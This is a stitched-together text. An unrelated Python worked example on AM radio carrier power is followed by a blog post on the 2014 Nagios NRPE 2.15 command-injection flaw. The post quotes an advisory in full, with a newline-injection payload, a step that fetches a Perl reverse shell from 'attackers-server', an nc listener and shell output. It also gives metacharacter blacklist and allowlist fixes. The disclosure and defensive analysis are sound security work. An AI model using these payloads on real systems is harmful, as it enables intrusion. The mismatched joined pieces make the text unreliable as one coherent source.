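An added worked example (mine, not from W8JI or the posts quoted above) that carries the power relationships through in Python: am_power() reproduces the 100 W carrier figures, and carrier_controlled_power() models the carrier-control scheme as Tom Ray describes it, carrier dipped by a set number of dB at modulation peaks with sideband power unchanged. The reduced-carrier model is my simplification, and loads are normalized so that power is amplitude squared.

```python
import math


def am_power(carrier_w, m):
    """Power budget of full-carrier AM with sinusoidal modulation index m (0..1).
    Each sideband amplitude is m/2 of the carrier amplitude, so each sideband carries
    m^2/4 of the carrier power; the envelope peak amplitude is (1 + m) times the carrier's."""
    if not 0.0 <= m <= 1.0:
        raise ValueError("modulation index must be between 0 and 1 for undistorted AM")
    sideband_each = carrier_w * m * m / 4.0
    return {
        "carrier": carrier_w,
        "sideband_each": sideband_each,
        "average": carrier_w + 2.0 * sideband_each,
        "pep": carrier_w * (1.0 + m) ** 2,
    }


def carrier_controlled_power(carrier_w, m, carrier_dip_db):
    """Same budget when the carrier is dipped by carrier_dip_db at modulation peaks while
    the sideband power is left as it was (the behaviour Tom Ray describes). Assumed model."""
    full = am_power(carrier_w, m)
    reduced_carrier = carrier_w * 10.0 ** (-carrier_dip_db / 10.0)
    sideband_each = full["sideband_each"]
    # Amplitudes add at the envelope peak: reduced carrier plus both sideband amplitudes.
    peak_amplitude = math.sqrt(reduced_carrier) + 2.0 * math.sqrt(sideband_each)
    return {
        "carrier": reduced_carrier,
        "sideband_each": sideband_each,
        "average": reduced_carrier + 2.0 * sideband_each,
        "pep": peak_amplitude ** 2,
    }


def average_power_saving(carrier_w, m, carrier_dip_db):
    """Fraction by which average (heating) power drops relative to plain AM."""
    plain = am_power(carrier_w, m)["average"]
    controlled = carrier_controlled_power(carrier_w, m, carrier_dip_db)["average"]
    return 1.0 - controlled / plain


if __name__ == "__main__":
    print("plain AM, 100 W carrier, m=1:", am_power(100.0, 1.0))
    print("3 dB carrier dip at the peak:", carrier_controlled_power(100.0, 1.0, 3.0))
    print(f"average power saving: {average_power_saving(100.0, 1.0, 3.0):.1%}")
```

With a 3 dB dip at full modulation the model's average power lands about a third below plain AM, in the same region as the reduction reported for the 3DX50 above, while the PEP the final must handle falls from 400 W to a little under 300 W.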

NRPE Exploit and Solution - Kirby's Musings

I don't often get on my soapbox, but this has gone on too long without resolution.

1. 4/20/2014, this was posted:


Recently, news emerged about a 'vulnerability' in Nagios's NRPE 'agent' - http://1337day.com/exploit/22156 Essentially, you can use it to write files or items to /tmp (or any 'write all' directory ('777')) as below:

nagios@nagios-server:/usr/local/nagios/libexec# /usr/local/nagios/libexec/check_nrpe  -H myServer -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
Then if you look on your 'monitored server', you'll see:

root@myServer:/proc# cd /tmp/
root@myServer:/tmp# ls -la
total 24
drwxrwxrwt 4 root root 4096 Apr 20 20:24 .
drwxr-xr-x 22 root root 4096 Apr 18 10:30 ..
-rw-r--r-- 1 nagios nagios 0 Apr 20 20:25 vulntest
This isn't best - as has been seen, some pretty bad people can use this to put all kinds of bitcoin mining rubbish on there, amongst other things. Now, this only works because /tmp is writable to everyone (even on my test server, see below):

root@server:/# ls -la | grep tmp
drwxrwxrwt 4 root root 4096 Apr 20 20:24 tmp
So - answer number 1 - secure it! Now, if you're savvy and use a config management tool like Puppet, Chef, Ansible etc. then you can do this en masse. For me, I've only got the one test server, so I just edited /etc/fstab:

/dev/sda7 /tmp ext3 nosuid,noexec,nodev,rw 0 0

This stops executables running from /tmp, neither any suid programs (more information here): http://www.techrepublic.com/blog/linux-and-open-source/secure-temporary-files-in-linux/171/#.

Next step - answer number 2 - secure your boxes with a firewall. NRPE agents should ONLY be accessible from the Nagios monitoring server. The simplest way is to use iptables on the box:

iptables -I INPUT 2 -s -p tcp --dport 5666 -j ACCEPT
And reject NRPE from any other server. This means only your Nagios server can access the box via 5666 - so, unless your monitoring server gets compromised, you should be in good shape.

So - /tmp isn't writable, and no-one can run check_nrpe against the box except your monitoring server.

Finally - look at SELinux if you're using RHEL/CentOS and the likes, and also look at this guide here: http://nagios.sourceforge.net/docs/3_0/security.html

At the end of the day, your network is only as secure as you make it - therefore I'd recommend a review of who can access your internal networks, HOW they got access (firewalls, NAT, etc.) and a review of your IPS/IDS if you are experiencing this issue.

Also - this may be of interest in the future - check_by_ssh - http://www.techrepublic.com/blog/linux-and-open-source/remotely-monitor-servers-with-the-nagios-check-by-ssh-plugin/

We are currently looking at a patch for this issue in the coming days, so stay tuned to Twitter/Opsview forums for more on this issue.

Sam Marsh
Product Manager
Opsview

2. From http://1337day.com/exploit/22156
NRPE <= 2.15 - Remote Command Execution Vulnerability, 4/19/2014:

NRPE - Nagios Remote Plugin Executor  <= 2.15 Remote Command Execution
Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to
execute Nagios plugins on remote Linux/Unix machines.
The main reason for doing this is to allow Nagios to monitor "local" resources
(like CPU load, memory usage, etc.) on remote machines. Since these public
resources are not usually exposed to external machines, an agent like NRPE must
be installed on the remote Linux/Unix machines.
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could
allow an attacker to remotely inject and execute arbitrary code on the host
under NRPE account (typically 'nagios').
The vulnerability is due to NRPE not properly sanitizing user input before
passing it to a command shell as a part of a configured command.
In order for an attacker to take advantage of the host NRPE must be compiled
and configured with command arguments.
No authentication is required to exploit this vulnerability if the NRPE port
has not been protected with a firewall.
NRPE expects definitions of commands in nrpe.cfg config file. Some of the
examples given in the config with hardcoded arguments are:
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1
When command arguments are enabled, the user is also allowed to define
commands with variables like:
command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$
command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
This is often suggested for convenience in various nagios/nrpe setup tutorials
on the web.
To get a result from a defined command in NRPE daemon the following nrpe client
can be used with -a option that passes arguments:
# /usr/local/nagios/libexec/check_nrpe  -H -c check_users -a 4 4
USERS OK - 4 users currently logged in |users=4;4;4;0
In case check_users was defined with arguments as shown above,
NRPE would execute:
/usr/local/nagios/libexec/check_users -w 4 -c 4
on the local system.
As we can find in the source code of nrpe-2.15/src/nrpe.c, the NRPE daemon uses the popen() function for
command execution:
/* executes a system command via popen(), but protects against timeouts */
int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){
                /* run the command */
Using popen() results in the command being executed with the help of a command shell.
Before this function is reached, however, NRPE takes several measures to prevent
malicious command injection to the shell. That includes filtration based on a blacklist:
#define NASTY_METACHARS         "|`&><'\"\\[]{};"
/* make sure request doesn't contain nasties */
    syslog(LOG_ERR,"Error: Request contained illegal metachars!");
that prevents bash special characters like semicolon, pipe etc.
The code is also making sure that arguments do not contain bash command substitution,
i.e. $(ps aux):
if(strstr(macro_argv[x],"$(")) {
    syslog(LOG_ERR,"Error: Request contained a bash command substitution!");
    return ERROR;
Despite these checks the code is vulnerable to command injection, as the bash shell allows
for multiple command execution if commands are separated by a new line.
None of the checks examines the arguments for an occurrence of a new line character (0x0A).
To execute an arbitrary command an attacker could simply add a new line character after
a parameter and follow it with his own command.
To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:
# /usr/local/nagios/libexec/check_nrpe  -H -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
which makes the NRPE daemon run the following series of commands:
/usr/local/nagios/libexec/check_users -w <new_line>
touch /tmp/vulntest
# -c 4
and a file /tmp/vulntest would be created with the nagios user as the owner. The hash character is to comment
out the rest of the arguments.
An attacker gets a limited set of commands as most of the metacharacters are prohibited by the
blacklist. So for example it's difficult to create new files in the system without using > symbol etc.
An attacker could however download a snippet of perl/python etc. code from the web by using wget or
curl command and get a reverse shell. This would allow unrestricted access to the command line:
---------[revshell.pl on attackers-server]---------
use Socket;
#attackers ip to connect back to
    exec("/bin/sh -i");
/usr/local/nagios/libexec/check_nrpe  -H -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 "
[attacker@ ]# nc -v -l 8080
Connection from port 8080 [tcp/ddi-tcp-1] accepted
sh-4.1$ id
uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd)
sh-4.1$ cat /etc/passwd | head -n 4 ; pwd
sh-4.1$ ls -l /tmp/tmp_revshell
-rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell
sh-4.1$ rm -f /tmp/tmp_revshell
An attacker could exploit the vulnerability to gain access to the system
in the context of the nagios user; this could lead to further compromise
of the server.
The current version of NRPE (2.15) and older are vulnerable.
Disable command arguments if possible.
Protect access to the NRPE port and only allow access from a trusted
nagios server.
Install an updated version of NRPE when it becomes available.

3. From http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details :

Current Version
Last Release Date
Compatible With
  • Nagios 1.x
  • Nagios 2.x
  • Nagios 3.x

4. Yes, so that's V2.15, released on 09-06-2013, found exploitable on 4-19-2014, responded to on 4-20-2014... and not fixed by 07-29-2014.

I've written my own patch and applied it to systems I work on:

#define NASTY_METACHARS         "\x7c\x60\x26\x3e\x3c\x27\x22\x24\x5c\x5b\x5d\x7b\x7d\x28\x29\x3b\x2a\x0a\x0d\x7f\x3f\x2e"
/*
 *  Nasty Characters as defined by kirby:
 *  pipe, backtick, ampersand, lessthan, greaterthan,
 *  singlequote, doublequote, dollar sign, backslash, brackets,
 *  curlybraces, parenthesis, semicolon, asterisk, newline (\x0a),
 *  carriage return (\x0d), delete (\x7f), question mark, period.
 *  The rest of ASCII \x01 (start of heading) through \x1f
 *  (unit separator) is skipped; \x04 is EOF.
 *  Exclude \! because it's the argument separator.
 */
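The advisory's finding (the 2.15 blacklist never looks for 0x0A) and the hex-escaped replacement above both frame the question as which bytes to forbid. The following is an added example, not NRPE project code and not the patch above, that puts a model of the 2.15 check next to an allowlist that accepts only what a threshold or device path needs; the allowed punctuation set is an assumption of this example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Blacklist as quoted from the advisory for nrpe 2.15. */
#define NASTY_METACHARS_2_15 "|`&><'\"\\[]{};"

/* Models the 2.15 behaviour the advisory describes: an argument is
 * rejected only if it contains a blacklisted byte or a "$(" substitution.
 * A bare newline passes, which is the whole problem. */
bool nrpe_2_15_rejects(const char *arg)
{
    return strpbrk(arg, NASTY_METACHARS_2_15) != NULL ||
           strstr(arg, "$(") != NULL;
}

/* Allowlist alternative: accept only ASCII letters, digits and the few
 * punctuation characters a threshold ("15,10,5", "20%") or a device path
 * ("/dev/hda1") needs. Every control byte (newline included), DEL, every
 * non-ASCII byte and every shell metacharacter fails. The punctuation
 * set below is an assumption for this example, not an NRPE setting. */
bool arg_is_safe(const char *arg)
{
    static const char extra_ok[] = " ,.-_/%:=";
    for (const unsigned char *p = (const unsigned char *)arg; *p != '\0'; p++) {
        if (*p >= 0x80 || !isprint(*p))
            return false;                     /* \n, \r, DEL, non-ASCII */
        if (!isalnum(*p) && strchr(extra_ok, (int)*p) == NULL)
            return false;                     /* # $ ; | ` ( ) etc. */
    }
    return true;
}

int main(void)
{
    /* Constructed inputs: normal thresholds plus the advisory's newline payload. */
    const char *inputs[] = { "4", "15,10,5", "/dev/hda1",
                             "\n touch /tmp/vulntest #", "a;b" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("input %zu: 2.15 rejects=%s  allowlist accepts=%s\n", i,
               nrpe_2_15_rejects(inputs[i]) ? "yes" : "no",
               arg_is_safe(inputs[i]) ? "yes" : "no");
    return 0;
}
```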

The fact that this issue has been unaddressed for three months, in one of the central daemons of Nagios, is reprehensible. Additionally, the initial text of the #define given includes a second error in it: an unescaped single quote. I sidestepped the escape issue by declaring them all as hexadecimal from the ASCII chart. This speaks of three glaring problems: 1) no code review, 2) no code testing, and 3) no actual security testing or analysis.

While Sam Marsh is right that the daemon should be firewalled off from all hosts except for the intended target / host, the fact that this is considered a remedial measure is also unacceptable. Security should come through defense in depth, not a hurried response to the crisis of the day. Security should be involved from the very beginning, particularly where network communications are involved.

The fact that this product is being sold for money means that at the very least, a gaping hole like this should be addressed post-haste.